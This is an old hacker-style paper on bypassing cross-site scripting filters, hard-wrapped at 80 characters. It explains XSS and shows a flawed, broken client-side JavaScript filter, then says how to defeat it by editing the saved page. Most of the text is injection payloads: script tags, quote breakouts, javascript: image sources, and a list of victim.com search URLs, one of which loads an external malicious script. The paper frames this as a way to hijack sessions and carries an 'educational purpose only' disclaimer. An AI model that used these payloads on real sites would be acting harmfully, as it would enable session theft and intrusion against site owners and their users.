/*Cross Site Scripting filtration Bypass

Arham Muhammad
rko.thelegendkiller@gmail.com */
________________________________________________________________________________
_____________________________________________
_1
__________________________________________
Introduction To Xss(Cross site scripting):
'Cross-Site Scripting' also known as 'XSS' in short is a kind of vulnerability t
hat exist in era of both web applications
as well as os based applications, but in most cases in web applications.You migh
t be wondering why it's known as 'xss' not
'css' reffering to the full form.Well, basically css is already a reserved abbre
viation of 'Cascade Style Sheets'.It allows
malicious code to be executed on a vulnerable server most probably session hijac
king to gain administrator privileges.
Xss totally depends on cookies and session and though 'cookies' are known as the
backbone of Cross-Site Scripting
Vulnerability.
_2
_______________________________
Brief Description On The Paper:
The paper is based on the bypassing of filtration of a common web application se
curity hole known as
Xss(Cross site scripting). Xss being a common hole is winning attention of webma
sters and their concerns
about the afteraffects and the danger that can be exploited through a possible x
ss hole, and because of this
most webmasters are patching or acutally it can be said they are filtering and s
anitizing common known xss injection
strings to deny a malicious input or request to overcome xss holes.
These people think that it's just enough to filter some common known strings and
boom that's it, but it's not likely
to say that you have 'filtered' the holes with just some common known characters
.
________________________________________________________________________________
__
_3
_____________________________________________
Common Xss Strings To Inject:
Basically, javascript and html and in some cases vbscript is injected through a
xss vulnerability in a particular
server.Php can't be injected since it's server-side and is executed on the very
moment.Thus we will first analyse some
common xss strings to inject.
1{ <html><font color="Red"><b>Pwned</b></font></html>
This is a basic html injection and if you are able to execute it on a vulnerable
server you will see the message
'pwned' somewhere on the vulnerable site.
2{ <script>alert('xss')</script>
This is a basic javascript injection which will display a pop-up box with the me
ssage 'xss' on it.
3{ "><script>alert('xss')</script>
This is a secondary javascript injection to the vulnerable server, which is also
mostly patched on most servers
being a common string.
________________________________________________________________________________
____________________________
_4
_____________________________________________
Xss Filteration Pattern And Overcoming It:
Webmasters mostly filter common strings in javascript to prevent hijacking, whic
h means a gurantee bypass on the server,
since javascript is client-side and once the page is saved and altered, the hack
er comes to the scene!
We will now examine the filtration pattern in javascript.
-----------------------------------------------------
<script Language="JavaScript">
function denyxssreplacestring()
{
var length = document.forms[0].elements.length;
for (var i = 0; i < document.forms[0].elements.length; i++)
}
{
if (document.forms[0].elements.value != malstring(document.forms[0].elements.val
ue))
}
{
alert ("Cross-Site Scripting Attempt!");
return (false);
}
function malstring(string) {
string = string.replace(/\</g,"");
string = string.replace(/\>/g,"");
string = string.replace(/\+/g,"");
return (string);
}
//--></script>
-----------------------------------------------------
Now we see that the javascript is sanitizing user's input and keeping in view th
e length of string, which if exceed the
length or input any malicious string, it will abort the request excluding unsani
tized strings, remove the string and
generate an alert message.
How simple, if we just save the page with xss filtration and alter it and remove
the javascript, save again and
inject some ~censored~, bump! it works!
Now you might be wondering that if we alter the page, then save and inject, it's
of no use, since the server side work is
finished, but you are wrong!
Lets take an example of a search form
--------------------------------------
FORM ACTION="search.php" METHOD="GET">
<INPUT TYPE="Hidden" NAME="search" VALUE="">
--------------------------------------
Now we see the server is making a 'GET' Request, which means our altered page wi
ll work for sure! Since it's sending a get
request to 'search.php' without any filteration and wow! what we have here is a
nice old vulnerable server to hijack session
or exploit some other way!
_5
____________________________________________________
Bypassing Xss Simple Filteration Without Alteration:
Now we notice, the above script we used for filtration is evolving only a few st
rings, knowing there are bunch of ways and
strings to inject a malicious request.
It's only filtering '< > /' means leaving hackers with a vast amount of other st
rings to inject a malicious code.
Now the question is since '<' and '>' are filtered, how we will be able to send
a javascript or html code injection?
Well, the answer is quite easy, javascript can be executed using ' and " before
the orignal script.
For instance,
')alert('xss');
This will generate an alert box again on a vulnerable server.
Secondly,
");alert('xss');
This will too generate an alert box on a vulnerable server.
___________________________________________________________
_6
__________________________________________________________
Bypassing Advance Xss Filtration:
Some webmasters filter lot more than this, especially it's filtered on important
sites like gov and org sites.
But all depends on their pattern if they are doing this in javascript, we will o
f course just alter the page but what if
the filtration is not in javascript, instead is in html or php or even asp.
There's nothing impossible, we will try to get as much info about the filtration
as much we can.
Supposing a server that have filtered all strings just more than common in a way
that it reads the malicious string in the
beginning or in the end to avoid and abort it, this of course can be bypassed to
o!
An example can be likely so:
helloworld<script>alert('xss')</script>
The above script will bypass filtration for the server that reads the malicious
string in the beginning.
helloworld<script>alert('xss')<script>helloworld
This will bypass filtration on server that reads whether in the beginning or in
the end or at both ends!
Mostly, this kind of filtration isn't common, so cant be of much use!
Some webmasters also filter the word 'xss' so it's likely to use some other mess
age for making an alert.
<script>alert('hello world')</script>
This will bypass message filtration.
Now we will study some more advance filtration bypass.
Some webmasters just simply define a pattern of a cross-site scripting script th
at is possibly common.
In this case, I will mention here the full array of strings to inject, bypassing
the filtration.
We will suppose injecting in a search form.
victim.com/search.php?query="><script>alert('hello world')</script>
victim.com/search.php?query="><script>alert("hello world")</script>
victim.com/search.php?query="><script>alert("hello world");</script>
victim.com/search.php?query="><script>alert(/hello world");</script>
victim.com/search.php?query=//"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc<script>alert(/hello world/);</script>
victim.com/search.php?query=abc"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc"></script><script>alert(/hello world/);</script>
victim.com/search.php?query=abc//abc"></script>alert(/hello world/);</script>
victim.com/search.php?query=000"><script></script><script>alert(1337);</script>
victim.com/search.php?query=000abc</script><script>alert(/1337/);</script>
victim.com/search.php?query=--<script>"></script>alert(/1337/);</script>
victim.com/search.php?query=pwned<script>document.write('abc');</script>
victim.com/search.php?query=pwned</script><script>document.write(1337);</script>
victim.com/search.php?query=pwned')alert(1337);//
victim.com/search.php?query=pwned";)alert(1337);//
victim.com/search.php?query=pwned");alert(/pwned/);//
victim.com/search.php?query=pwned//"></script><script>location.href='javascript:
alert(/pwned/);</script>
victim.com/search.php?query="><img src='javascript:alert('xss');'>
victim.com/search.php?query="><script src='http://malicous js'</script>
--------------------------------------------------------------------------------
These are some of the advance arrays of javascript code injection on a vulnerabl
e server through xss.
This includes a quite advance range, bypassing the filtration pattern from alpha
to numeric and alpha-numeric,
overcoming, if the word 'alert' is filtered, with 'document.write' and 'location
.href' functionality,
and of course you can do a lot addition in it as long as you know what exactly a
re you doing :p
overcoming simple and both advance filtration pattern, giving a 99% chance to su
cceed in all aspects!
________________________________________________________________________________
__________________________
Conclusion:
The paper is based on bypassing both simple and advance filtration patterns and
gaining infinity advantages!
I wrote this article, as "Cross-Site Scripting" being in my interest and this pa
per is for educational purpose only!
I don't hold any responsibility for any misuse or real-time exploitation from th
is paper!
________________________________________________________________________________
___________________________
/ Shouts ANd Greets To: str0ke,USMAN,tushy,Hackman,shubham,Fix and all my friend
s!